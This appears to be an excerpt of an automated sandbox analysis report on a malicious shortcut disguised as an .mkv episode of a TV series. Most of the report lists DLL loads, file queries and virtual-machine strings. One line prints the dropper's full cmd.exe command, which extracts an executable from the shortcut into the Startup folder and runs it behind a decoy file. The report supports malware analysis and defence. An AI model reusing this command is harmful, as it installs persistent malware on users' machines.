Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.playback.mediaplayer.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.mediacontrol.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfmediaengine.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: audioses.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.devices.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.playback.proxystub.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: devdispitemprovider.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ddores.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: defaultdevicemanager.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.web.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: comppkgsup.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfmkvsrcsnk.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: appcontracts.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cdprt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cdp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfps.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfmp4srcsnk.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfsrcsnk.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msamrnbsource.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfasfsrcsnk.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfds.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msflacdecoder.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: avrt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfmpeg2srcsnk.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfnetsrc.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfnetcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ninput.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.media.protection.playready.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wpnapps.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.networking.backgroundtransfer.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.applicationmodel.lockscreen.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wincorlib.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: lockappbroker.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: biwinrt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: schannel.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: microsoftaccountwamextension.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mfsvr.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.applicationmodel.background.timebroker.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: webio.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: gnsdk_fp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mf.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeCode function: 8_2_000001D1E2E348A6 push ebp; iretd 8_2_000001D1E2E348A7
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeCode function: 8_2_000001D1E2E34973 push ebp; iretd 8_2_000001D1E2E34974
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeCode function: 8_2_000001D1E2E30389 push ebp; iretd 8_2_000001D1E2E3038A
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeCode function: 8_2_000001D1E2E31960 push BA000002h; iretd 8_2_000001D1E2E31965
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeCode function: 8_2_000001D1E2E303F3 push ebp; iretd 8_2_000001D1E2E303F4
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeCode function: 8_2_000001D1E2E34909 push ebp; iretd 8_2_000001D1E2E3490A
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeCode function: 8_2_000001D1E5EC4303 push esp; retf 8_2_000001D1E5EC4306

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\user.exeJump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\user.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: Amcache.hve.1.drBinary or memory string: VMware
Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
Source: Video.UI.exe, 00000008.00000002.1505062820.000001D1E53FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMSAFD L2CAP [Bluetooth]MSAFD Tcpip [TCP/IP]
Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.drBinary or memory string: VMware-42 27 c8 0c e4 52 1d cc-a0 8f d3 a4 82 3e 8f 04
Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Video.UI.exe, 00000008.00000002.1505143137.000001D1E570E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.drBinary or memory string: vmci.sys
Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.drBinary or memory string: VMware20,1
Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Video.UI.exe, 00000008.00000002.1503246259.000001D1E2C51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe Findstr /v "System32 Rj672" Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.LnkJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v:on/cset i=reacher.s03e04.1080p.web.h264-successfulcrab.mkv&set w="c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\user.exe"&(if not exist !w! findstr/v "system32 rj%time:~7,1%%time:~-2%" !i!.lnk>!w!&start "" !w!)&cd c:\users\user\appdata\local\temp&echo.>!i!&start !i!
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.jfm VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\Database\anonymous\tmp.edb VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\LocalState\SRPData.xml VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
